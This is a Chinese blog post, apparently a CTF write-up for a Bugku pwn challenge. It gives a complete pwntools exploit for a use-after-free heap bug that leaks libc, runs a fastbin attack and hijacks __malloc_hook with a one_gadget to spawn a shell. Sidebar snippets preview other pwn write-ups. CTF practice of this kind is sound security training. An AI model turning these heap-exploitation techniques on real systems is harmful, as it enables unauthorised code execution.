记一次bugku pwn题解4月27日

最新推荐文章于 2023-08-27 22:40:16 发布
最新推荐文章于 2023-08-27 22:40:16 发布
阅读量511 收藏
点赞数 2
分类专栏: bugku awd 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124459786
版权

记一次bugku pwn题解4月27日

emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。
在这里插入图片描述
uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和远程,那就利用realloc来调整一下呗。realloc + 0本地直接成功,远程就是打不通。。。。。
一开始保护也没看,可以直接改got表。。。总结来说就是太飘了。。。。
题目链接:z1r0’s github
这里给出本地的exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 0
if debug:
    r = remote('192-168-1-192.pvp1029.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Command:'

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('size:', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index:', str(index))
    r.sendafter('Content:', content)

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index:', str(index))

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index:', str(index))

add(0x80)   #0
add(0x60)   #1
add(0x60)   #1
add(0x60)   #3
add(0x10)   #4
delete(4)
edit(4, '/bin/sh')


delete(0)
show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

#libc = ELF('./libc.so.6')
libc = ELF('./2.23/libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']
#one = [0x46428, 0x4647c, 0xe9415, 0xea36d]
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[0] + libc_base
realloc_hook = libc_base + libc.sym['realloc']
system_addr = libc_base + libc.sym['system']

add(0x80) #5
delete(1)
p1 = p64(malloc_hook - 0x23)
edit(1, p1)

add(0x60)   #6
add(0x60)   #7
p2 = b'a' * 0xb + p64(one_gadget) + p64(realloc_hook)
edit(7, p2)

add(0x30)

r.interactive()

这里笔者差忘记一个点,ida反汇编的时候switch这里会失败,看汇编的时候有一个垃圾数据nop掉就行。
在这里插入图片描述
在这里插入图片描述
再接再厉吧仔细点仔细点。。。

z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
bugku 里面的五个pwn题wp
qq_36495104的博客
05-08 2132
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
BugKu做题录【pwn】(持续更新中)
Assassin
04-06 3168
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 335
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
Bugku PWN Easy_int
JEWSWS的博客
04-01 344
【春风不解语,独做狮子吟。】
【awd系列】Bugku S3 AWD排位赛-9 pwn类型
weixin_42072280的博客
08-27 1109
Bugku S3 AWD排位赛-9 pwn类型
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn远程打通本地打不通的“玄学“问题解
fa1c4的blog
09-30 2310
前言 速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事 问题 查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地 解决 参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib
BUU PWN(一)
playmaker的博客
01-28 2103
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 1906
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
关于jarvisOJ level0远程打得通本地打不通的问题
fjh1997的博客
07-30 1117
今天给学弟演示最简单的pwn题的时候居然翻车了,没想到还是这个xmm寄存器的问题,我tcl,录一下。 原来的exp是这样。 就是很简单的调用这个callsystem 结果本地打不通。 from pwn import* r=gdb.debug("./pwn_02","b* 0x00400597") #r=remote("52.82.121.166", 28068) #r=process("./pwn_02") pad=b'a'*0x88 add=p64(0x400596) payload=pa
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1914
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4023
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
一次bugku awd pwn题解4月19
z1r0的博客
04-19 1341
一次bugku awd pwn题解4月19 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1336
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2008
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
那么怎么打开一个pwn题呢
最新发布
09-11
打开一个 Pwn 题需要以下几个步骤: 1. 下载并安装 Pwn 工具集。Pwn 工具集包括 GDB、IDA Pro、pwntools 等工具,可以帮助你进行 Pwn 题目的分析和攻击。你可以在官网上下载并安装 Pwn 工具集。 2. 阅读题目描述和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值